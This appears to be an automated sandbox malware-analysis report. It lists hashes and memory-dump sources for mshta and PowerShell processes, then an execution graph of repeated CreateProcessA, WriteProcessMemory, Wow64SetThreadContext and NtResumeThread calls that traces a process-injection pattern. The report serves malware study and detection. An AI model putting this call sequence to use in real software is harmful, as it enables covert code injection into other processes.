                                                                                                                                    • Opcode ID: 67018309a147a89e998d3728c0dfb2112279536e5b47b0a94d7f93674794cbbf
                                                                                                                                    • Instruction ID: 9dfa142d23b3fae64ccc735d4b057d6031273d93375af2801a8a8b8206519c66
                                                                                                                                    • Opcode Fuzzy Hash: 67018309a147a89e998d3728c0dfb2112279536e5b47b0a94d7f93674794cbbf
                                                                                                                                    • Instruction Fuzzy Hash: 1A41686121DF8E8FFB99966C941E7513BE1EF66310F1905DAC085CF2E3D12A8C41C781
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000003.1800829494.000002059E1C1000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002059E1C1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_3_2059e1c1000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6bc73aa3d23e2871f536d547a4137b2f2971a8f5cfe8d9173bd04d867febdfff
                                                                                                                                    • Instruction ID: 1d7f1314a00baa6614de7eadec949cde4dd947ecc866ffa48f7ab1da08ed3d82
                                                                                                                                    • Opcode Fuzzy Hash: 6bc73aa3d23e2871f536d547a4137b2f2971a8f5cfe8d9173bd04d867febdfff
                                                                                                                                    • Instruction Fuzzy Hash: 70417771609B8D8FFB899768E41E7503BE1EF66310F1901DAC489CF2A3D1298C81CB81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000003.1800890511.000002059AFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002059AFE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_3_2059afe0000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction ID: b639acf9b907e80582ee3a480e0f4bd195b5753a9d77e2c05c2e2ec8add3640b
                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction Fuzzy Hash: D99002094D595A95D41452D10C4935D5040A388250FE45880541690146D44D02A615E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000003.1800890511.000002059AFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002059AFE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_3_2059afe0000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction ID: b639acf9b907e80582ee3a480e0f4bd195b5753a9d77e2c05c2e2ec8add3640b
                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction Fuzzy Hash: D99002094D595A95D41452D10C4935D5040A388250FE45880541690146D44D02A615E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000003.1800890511.000002059AFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002059AFE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_3_2059afe0000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction ID: b639acf9b907e80582ee3a480e0f4bd195b5753a9d77e2c05c2e2ec8add3640b
                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction Fuzzy Hash: D99002094D595A95D41452D10C4935D5040A388250FE45880541690146D44D02A615E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000003.1800890511.000002059AFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002059AFE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_3_2059afe0000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction ID: b639acf9b907e80582ee3a480e0f4bd195b5753a9d77e2c05c2e2ec8add3640b
                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                    • Instruction Fuzzy Hash: D99002094D595A95D41452D10C4935D5040A388250FE45880541690146D44D02A615E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.1795859198.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                    • Instruction ID: 5004c912797fa5de54a08eeb6e6b4a8434c1f80db3f3e8eee4f15695996a7ab3
                                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                    • Instruction Fuzzy Hash: 3201677121CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5D636E881CB45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.1796256567.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 21226aca87e00a3476a00580fa172f73c6c7285a6805dcf04da4a5d5916199b0
                                                                                                                                    • Instruction ID: 2629795f65d7e4243dc771453b6d1c4c77407d142c25f6a22bd10cc854d2ec2a
                                                                                                                                    • Opcode Fuzzy Hash: 21226aca87e00a3476a00580fa172f73c6c7285a6805dcf04da4a5d5916199b0
                                                                                                                                    • Instruction Fuzzy Hash: 6BE09223F0E86E0EEBA1E998282C1B86681DF5962570501B6E91CE31A1DD0499108281
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.1795859198.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9461f6e70688bd5f76c3924c8cc7c85e0411677ca27c2754c7ddb79e196a3487
                                                                                                                                    • Instruction ID: 48e3497b0a3e61ad953fea3b4bc9450efa8f069d8ad4dbc22fc9d580d567a410
                                                                                                                                    • Opcode Fuzzy Hash: 9461f6e70688bd5f76c3924c8cc7c85e0411677ca27c2754c7ddb79e196a3487
                                                                                                                                    • Instruction Fuzzy Hash: 2E51C613B0F7D64EE72267BCB8B54E53B70EF5366870A01F3C5D85E0A7DD14294A8262

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:4.7%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:10.4%
                                                                                                                                    Total number of Nodes:336
                                                                                                                                    Total number of Limit Nodes:18
                                                                                                                                    execution_graph 69280 75d7e38 69281 75d7e50 69280->69281 69286 3172a80 69281->69286 69290 3172a7c 69281->69290 69294 3172aeb 69281->69294 69282 75d7f5b 69287 3172acb WriteProcessMemory 69286->69287 69289 3172b1c 69287->69289 69289->69282 69291 3172acb WriteProcessMemory 69290->69291 69293 3172b1c 69291->69293 69293->69282 69295 3172af2 69294->69295 69296 3172afa WriteProcessMemory 69294->69296 69295->69296 69297 3172b1c 69296->69297 69297->69282 68949 77ce530 68950 77ce545 68949->68950 68953 77ce570 68950->68953 68955 77ce59a 68953->68955 68954 77ce55b 68955->68954 68957 77efb78 68955->68957 68958 77efb8d 68957->68958 68964 77d0007 68958->68964 68968 77d01b6 68958->68968 68972 77d0040 68958->68972 68976 77d011d 68958->68976 68959 77efbaf 68959->68955 68965 77d0014 68964->68965 68966 77d0115 68965->68966 68980 77d0aa8 68965->68980 68966->68959 68969 77d00a5 68968->68969 68970 77d0115 68969->68970 68971 77d0aa8 8 API calls 68969->68971 68970->68959 68971->68969 68973 77d006d 68972->68973 68974 77d0115 68973->68974 68975 77d0aa8 8 API calls 68973->68975 68974->68959 68975->68973 68978 77d00a5 68976->68978 68977 77d0115 68977->68959 68978->68977 68979 77d0aa8 8 API calls 68978->68979 68979->68978 68981 77d0acd 68980->68981 69017 77d1d73 68981->69017 69021 77d1471 68981->69021 69026 77d1c30 68981->69026 69030 77d12fb 68981->69030 69034 77d11b5 68981->69034 69038 77d0af8 68981->69038 69042 77d13f8 68981->69042 69046 77d0cbc 68981->69046 69050 77d14f9 68981->69050 69055 77d0cfc 68981->69055 69062 77d1dc1 68981->69062 69066 77d0b08 68981->69066 69070 77d0bcb 68981->69070 69074 77d1489 68981->69074 69078 77d13c9 68981->69078 69082 77d170f 68981->69082 69089 77d0c4f 68981->69089 69093 77d0ecd 68981->69093 69098 77d128c 68981->69098 69102 77d1d14 68981->69102 69106 77d1cd6 68981->69106 69110 77d1a58 68981->69110 69118 77d1e18 68981->69118 69122 77d135f 68981->69122 69126 77d1d59 68981->69126 69130 77d1621 68981->69130 69134 77d1c9d 68981->69134 69138 77d9ce6 68981->69138 69142 77d1ae6 68981->69142 69146 77d16ab 68981->69146 69150 77d1827 68981->69150 69154 77d1baf 68981->69154 69161 77d0feb 68981->69161 69165 77d1673 68981->69165 69018 77d0c58 69017->69018 69169 77d8c38 69018->69169 69173 77d8c30 69018->69173 69022 77d147b 69021->69022 69177 77d8380 69022->69177 69181 77d8388 69022->69181 69023 77d15fb 69027 77d0c58 69026->69027 69028 77d8c38 WriteProcessMemory 69027->69028 69029 77d8c30 WriteProcessMemory 69027->69029 69028->69027 69029->69027 69031 77d0c58 69030->69031 69032 77d8c38 WriteProcessMemory 69031->69032 69033 77d8c30 WriteProcessMemory 69031->69033 69032->69031 69033->69031 69035 77d0c58 69034->69035 69036 77d8c38 WriteProcessMemory 69035->69036 69037 77d8c30 WriteProcessMemory 69035->69037 69036->69035 69037->69035 69039 77d0b3b 69038->69039 69040 77d8c38 WriteProcessMemory 69039->69040 69041 77d8c30 WriteProcessMemory 69039->69041 69040->69039 69041->69039 69043 77d0c58 69042->69043 69044 77d8c38 WriteProcessMemory 69043->69044 69045 77d8c30 WriteProcessMemory 69043->69045 69044->69043 69045->69043 69047 77d0c58 69046->69047 69048 77d8c38 WriteProcessMemory 69047->69048 69049 77d8c30 WriteProcessMemory 69047->69049 69048->69047 69049->69047 69051 77d1502 69050->69051 69053 77d8c38 WriteProcessMemory 69051->69053 69054 77d8c30 WriteProcessMemory 69051->69054 69052 77d0aef 69052->68965 69053->69052 69054->69052 69056 77d0d0b 69055->69056 69060 77d8388 Wow64SetThreadContext 69056->69060 69061 77d8380 Wow64SetThreadContext 69056->69061 69057 77d0c58 69058 77d8c38 WriteProcessMemory 69057->69058 69059 77d8c30 WriteProcessMemory 69057->69059 69058->69057 69059->69057 69060->69057 69061->69057 69063 77d0c58 69062->69063 69064 77d8c38 WriteProcessMemory 69063->69064 69065 77d8c30 WriteProcessMemory 69063->69065 69064->69063 69065->69063 69067 77d0b3b 69066->69067 69068 77d8c38 WriteProcessMemory 69067->69068 69069 77d8c30 WriteProcessMemory 69067->69069 69068->69067 69069->69067 69071 77d0b80 69070->69071 69072 77d8c38 WriteProcessMemory 69071->69072 69073 77d8c30 WriteProcessMemory 69071->69073 69072->69071 69073->69071 69075 77d0c58 69074->69075 69076 77d8c38 WriteProcessMemory 69075->69076 69077 77d8c30 WriteProcessMemory 69075->69077 69076->69075 69077->69075 69079 77d0c58 69078->69079 69080 77d8c38 WriteProcessMemory 69079->69080 69081 77d8c30 WriteProcessMemory 69079->69081 69080->69079 69081->69079 69083 77d171e 69082->69083 69085 77d8c38 WriteProcessMemory 69083->69085 69086 77d8c30 WriteProcessMemory 69083->69086 69084 77d0c58 69087 77d8c38 WriteProcessMemory 69084->69087 69088 77d8c30 WriteProcessMemory 69084->69088 69085->69084 69086->69084 69087->69084 69088->69084 69090 77d0c58 69089->69090 69091 77d8c38 WriteProcessMemory 69090->69091 69092 77d8c30 WriteProcessMemory 69090->69092 69091->69090 69092->69090 69094 77d0ed7 69093->69094 69185 77d92b0 69094->69185 69189 77d92a8 69094->69189 69095 77d0f2f 69099 77d0c58 69098->69099 69100 77d8c38 WriteProcessMemory 69099->69100 69101 77d8c30 WriteProcessMemory 69099->69101 69100->69099 69101->69099 69103 77d0c58 69102->69103 69104 77d8c38 WriteProcessMemory 69103->69104 69105 77d8c30 WriteProcessMemory 69103->69105 69104->69103 69105->69103 69107 77d0c58 69106->69107 69108 77d8c38 WriteProcessMemory 69107->69108 69109 77d8c30 WriteProcessMemory 69107->69109 69108->69107 69109->69107 69111 77d0ecd 69110->69111 69112 77d0c58 69110->69112 69114 77d92a8 NtResumeThread 69111->69114 69115 77d92b0 NtResumeThread 69111->69115 69116 77d8c38 WriteProcessMemory 69112->69116 69117 77d8c30 WriteProcessMemory 69112->69117 69113 77d0f2f 69114->69113 69115->69113 69116->69112 69117->69112 69119 77d0c58 69118->69119 69120 77d8c38 WriteProcessMemory 69119->69120 69121 77d8c30 WriteProcessMemory 69119->69121 69120->69119 69121->69119 69123 77d0c58 69122->69123 69124 77d8c38 WriteProcessMemory 69123->69124 69125 77d8c30 WriteProcessMemory 69123->69125 69124->69123 69125->69123 69127 77d0c58 69126->69127 69128 77d8c38 WriteProcessMemory 69127->69128 69129 77d8c30 WriteProcessMemory 69127->69129 69128->69127 69129->69127 69131 77d0c58 69130->69131 69132 77d8c38 WriteProcessMemory 69131->69132 69133 77d8c30 WriteProcessMemory 69131->69133 69132->69131 69133->69131 69135 77d0c58 69134->69135 69136 77d8c38 WriteProcessMemory 69135->69136 69137 77d8c30 WriteProcessMemory 69135->69137 69136->69135 69137->69135 69139 77d0c58 69138->69139 69140 77d8c38 WriteProcessMemory 69139->69140 69141 77d8c30 WriteProcessMemory 69139->69141 69140->69139 69141->69139 69143 77d0c58 69142->69143 69144 77d8c38 WriteProcessMemory 69143->69144 69145 77d8c30 WriteProcessMemory 69143->69145 69144->69143 69145->69143 69147 77d0c58 69146->69147 69148 77d8c38 WriteProcessMemory 69147->69148 69149 77d8c30 WriteProcessMemory 69147->69149 69148->69147 69149->69147 69151 77d0c58 69150->69151 69152 77d8c38 WriteProcessMemory 69151->69152 69153 77d8c30 WriteProcessMemory 69151->69153 69152->69151 69153->69151 69155 77d1bc7 69154->69155 69193 77d22a8 69155->69193 69208 77d22b8 69155->69208 69156 77d0c58 69157 77d8c38 WriteProcessMemory 69156->69157 69158 77d8c30 WriteProcessMemory 69156->69158 69157->69156 69158->69156 69162 77d0c58 69161->69162 69162->69161 69163 77d8c38 WriteProcessMemory 69162->69163 69164 77d8c30 WriteProcessMemory 69162->69164 69163->69162 69164->69162 69166 77d0c58 69165->69166 69167 77d8c38 WriteProcessMemory 69166->69167 69168 77d8c30 WriteProcessMemory 69166->69168 69167->69166 69168->69166 69170 77d8c80 WriteProcessMemory 69169->69170 69172 77d8cd7 69170->69172 69172->69018 69174 77d8c80 WriteProcessMemory 69173->69174 69176 77d8cd7 69174->69176 69176->69018 69178 77d8388 Wow64SetThreadContext 69177->69178 69180 77d8415 69178->69180 69180->69023 69182 77d83cd Wow64SetThreadContext 69181->69182 69184 77d8415 69182->69184 69184->69023 69186 77d92f8 NtResumeThread 69185->69186 69188 77d932d 69186->69188 69188->69095 69190 77d92b0 NtResumeThread 69189->69190 69192 77d932d 69190->69192 69192->69095 69194 77d22b8 69193->69194 69223 77d2318 69194->69223 69228 77d274f 69194->69228 69232 77d2b19 69194->69232 69236 77d23cd 69194->69236 69240 77d245c 69194->69240 69244 77d2463 69194->69244 69248 77d2892 69194->69248 69252 77d2446 69194->69252 69256 77d2481 69194->69256 69260 77d296a 69194->69260 69264 77d2646 69194->69264 69268 77d2328 69194->69268 69209 77d22cf 69208->69209 69211 77d23cd 2 API calls 69209->69211 69212 77d245c 2 API calls 69209->69212 69213 77d274f 2 API calls 69209->69213 69214 77d2b19 2 API calls 69209->69214 69215 77d2328 2 API calls 69209->69215 69216 77d2318 2 API calls 69209->69216 69217 77d296a 2 API calls 69209->69217 69218 77d2646 2 API calls 69209->69218 69219 77d2446 2 API calls 69209->69219 69220 77d2481 2 API calls 69209->69220 69221 77d2463 2 API calls 69209->69221 69222 77d2892 2 API calls 69209->69222 69210 77d22f1 69210->69156 69211->69210 69212->69210 69213->69210 69214->69210 69215->69210 69216->69210 69217->69210 69218->69210 69219->69210 69220->69210 69221->69210 69222->69210 69224 77d2322 69223->69224 69225 77d22e2 69223->69225 69272 77d7c80 69224->69272 69276 77d7c74 69224->69276 69225->69156 69229 77d23b5 69228->69229 69229->69228 69230 77d7c74 CreateProcessA 69229->69230 69231 77d7c80 CreateProcessA 69229->69231 69230->69229 69231->69229 69233 77d23b5 69232->69233 69234 77d7c74 CreateProcessA 69233->69234 69235 77d7c80 CreateProcessA 69233->69235 69234->69233 69235->69233 69237 77d23b5 69236->69237 69238 77d7c74 CreateProcessA 69237->69238 69239 77d7c80 CreateProcessA 69237->69239 69238->69237 69239->69237 69241 77d23b5 69240->69241 69242 77d7c74 CreateProcessA 69241->69242 69243 77d7c80 CreateProcessA 69241->69243 69242->69241 69243->69241 69245 77d23b5 69244->69245 69246 77d7c74 CreateProcessA 69245->69246 69247 77d7c80 CreateProcessA 69245->69247 69246->69245 69247->69245 69249 77d23b5 69248->69249 69250 77d7c74 CreateProcessA 69249->69250 69251 77d7c80 CreateProcessA 69249->69251 69250->69249 69251->69249 69253 77d23ac 69252->69253 69254 77d7c74 CreateProcessA 69253->69254 69255 77d7c80 CreateProcessA 69253->69255 69254->69253 69255->69253 69257 77d23b5 69256->69257 69258 77d7c74 CreateProcessA 69257->69258 69259 77d7c80 CreateProcessA 69257->69259 69258->69257 69259->69257 69261 77d23b5 69260->69261 69262 77d7c74 CreateProcessA 69261->69262 69263 77d7c80 CreateProcessA 69261->69263 69262->69261 69263->69261 69265 77d23b5 69264->69265 69266 77d7c74 CreateProcessA 69265->69266 69267 77d7c80 CreateProcessA 69265->69267 69266->69265 69267->69265 69269 77d235b 69268->69269 69270 77d7c74 CreateProcessA 69269->69270 69271 77d7c80 CreateProcessA 69269->69271 69270->69269 69271->69269 69273 77d7c87 CreateProcessA 69272->69273 69275 77d7e6c 69273->69275 69277 77d7c80 CreateProcessA 69276->69277 69279 77d7e6c 69277->69279 69298 77c1140 69299 77c1143 69298->69299 69306 77c14ad 69299->69306 69312 77c1170 69299->69312 69318 77c1180 69299->69318 69324 77cca04 69299->69324 69330 77c1270 69299->69330 69300 77c116b 69309 77c11d5 69306->69309 69307 77c12ad 69307->69300 69308 77c12ec 69308->69307 69311 77c1ad0 6 API calls 69308->69311 69309->69307 69309->69308 69336 77c1ad0 69309->69336 69311->69308 69315 77c1174 69312->69315 69313 77c12ad 69313->69300 69314 77c12ec 69314->69313 69316 77c1ad0 6 API calls 69314->69316 69315->69313 69315->69314 69317 77c1ad0 6 API calls 69315->69317 69316->69314 69317->69315 69321 77c1183 69318->69321 69319 77c12ad 69319->69300 69320 77c12ec 69320->69319 69323 77c1ad0 6 API calls 69320->69323 69321->69319 69321->69320 69322 77c1ad0 6 API calls 69321->69322 69322->69321 69323->69320 69327 77c11d5 69324->69327 69325 77c12ad 69325->69300 69326 77c12ec 69326->69325 69329 77c1ad0 6 API calls 69326->69329 69327->69325 69327->69326 69328 77c1ad0 6 API calls 69327->69328 69328->69327 69329->69326 69331 77c11d5 69330->69331 69332 77c12ad 69331->69332 69333 77c12ec 69331->69333 69334 77c1ad0 6 API calls 69331->69334 69332->69300 69333->69332 69335 77c1ad0 6 API calls 69333->69335 69334->69331 69335->69333 69337 77c1ad4 69336->69337 69338 77c1b0e 69337->69338 69343 77c26cc 69337->69343 69348 77c29a7 69337->69348 69353 77c1c35 69337->69353 69359 77c23c5 69337->69359 69338->69309 69344 77c26d2 69343->69344 69364 77c6f00 69344->69364 69368 77c6ef4 69344->69368 69349 77c29ad 69348->69349 69372 77c72f4 69349->69372 69376 77c7300 69349->69376 69354 77c23df 69353->69354 69355 77c1c1d 69353->69355 69380 77c7678 69354->69380 69384 77c7671 69354->69384 69356 77c241a 69360 77c23cf 69359->69360 69362 77c72f4 CreateFileMappingA 69360->69362 69363 77c7300 CreateFileMappingA 69360->69363 69361 77c29f1 69362->69361 69363->69361 69365 77c6f03 CreateFileA 69364->69365 69367 77c6ffb 69365->69367 69369 77c6ef8 CreateFileA 69368->69369 69371 77c6ffb 69369->69371 69373 77c72f8 CreateFileMappingA 69372->69373 69375 77c73f9 69373->69375 69377 77c7303 CreateFileMappingA 69376->69377 69379 77c73f9 69377->69379 69381 77c767b MapViewOfFile 69380->69381 69383 77c76f5 69381->69383 69383->69356 69385 77c7674 MapViewOfFile 69384->69385 69387 77c76f5 69385->69387 69387->69356
                                                                                                                                    APIs
                                                                                                                                    • NtResumeThread.NTDLL(?,?), ref: 077D931E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: 0e6ae7ecfc57d3a3093cd1aaabfa54a05b8f9311c1cb3c2d19755f702a7dcf97
                                                                                                                                    • Instruction ID: 48058dcf88928c7e24d27cd9b728eace7c35eeac161cc2517e74dd7ee88d9639
                                                                                                                                    • Opcode Fuzzy Hash: 0e6ae7ecfc57d3a3093cd1aaabfa54a05b8f9311c1cb3c2d19755f702a7dcf97
                                                                                                                                    • Instruction Fuzzy Hash: AC111AB1D002099FDB10DFAAC485BEEFBF8EF58324F14842AD519A7240CB746945CFA1
                                                                                                                                    APIs
                                                                                                                                    • NtResumeThread.NTDLL(?,?), ref: 077D931E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: ec570b589aeb0157c252cc3217ed60333236c6fcfaf70d085b52b58f3066bfa2
                                                                                                                                    • Instruction ID: 1297a237c3a89330f50131bd90e5971b6624cce106f06513aa23d07e04d9ba41
                                                                                                                                    • Opcode Fuzzy Hash: ec570b589aeb0157c252cc3217ed60333236c6fcfaf70d085b52b58f3066bfa2
                                                                                                                                    • Instruction Fuzzy Hash: 3F11E7B1D002099EDB10DFAAC485ADEFBF8EF98324F54842AD519A7240CB74A945CFA5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 21712c534b885fb37c9715da03c6e930651402c2d95667c920a6b307f8f47fce
                                                                                                                                    • Instruction ID: e69f3d41a707f64dd852caaa3db87aa41d541349f067d6d1e2cab7f989bc6cc0
                                                                                                                                    • Opcode Fuzzy Hash: 21712c534b885fb37c9715da03c6e930651402c2d95667c920a6b307f8f47fce
                                                                                                                                    • Instruction Fuzzy Hash: E6820774A012089FDB14DFA8D484AAEFBF2FF88314F25855AE855AB351D731ED81CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bb5175fcb7bebb67ef21fe2b288bc290f77de7749d54746d1b434cbcc0696716
                                                                                                                                    • Instruction ID: 1b6c141b4b9841e72400fcc2f3273df1b430a8b64ea931cf7b688df2914365f6
                                                                                                                                    • Opcode Fuzzy Hash: bb5175fcb7bebb67ef21fe2b288bc290f77de7749d54746d1b434cbcc0696716
                                                                                                                                    • Instruction Fuzzy Hash: 5752D5B4A002288FCB60DF68C884B9ABBB5FB49301F1095E9D54DAB355DB30AEC5CF54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1ac1a6812768fbea92b06708073c0a6021f22bededf81c4f3b356ba027946721
                                                                                                                                    • Instruction ID: 4a882c1aed1b623fea9f76872519a4e341e5e6b926f991ff9c845888d05005a4
                                                                                                                                    • Opcode Fuzzy Hash: 1ac1a6812768fbea92b06708073c0a6021f22bededf81c4f3b356ba027946721
                                                                                                                                    • Instruction Fuzzy Hash: BEA1E0B4A05218CFDB14CFA9D894BADB7F2BB8A340F50816ED509AB356DB345989CF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8033b9bc0fa9bc4d36a0f62a176c9fea14f79a090461dc2b4191139c8dc97dc0
                                                                                                                                    • Instruction ID: a55da42c9d0f95cfeb4d67a5c2ed64462a2e8390f7f1ed5ab6ff3a5605a43fbb
                                                                                                                                    • Opcode Fuzzy Hash: 8033b9bc0fa9bc4d36a0f62a176c9fea14f79a090461dc2b4191139c8dc97dc0
                                                                                                                                    • Instruction Fuzzy Hash: C2A1DFB4E05218CFDB14CFA9D894BADB7F2BB4A344F50816ED509AB356DB349989CF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8d37ce734aecad4ec4d1d53f0f5284cff12b7809788705f00661a55d41e1f2c9
                                                                                                                                    • Instruction ID: 5105c7b7b951b2ad547bc1985210a9a53165b4dfa5252b7cffdcb28eb8ddeb4a
                                                                                                                                    • Opcode Fuzzy Hash: 8d37ce734aecad4ec4d1d53f0f5284cff12b7809788705f00661a55d41e1f2c9
                                                                                                                                    • Instruction Fuzzy Hash: 4AA1C0B4E05218CFDB14CFA9D484BA9B7F2FB8A344F50916ED509AB356DB349985CF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
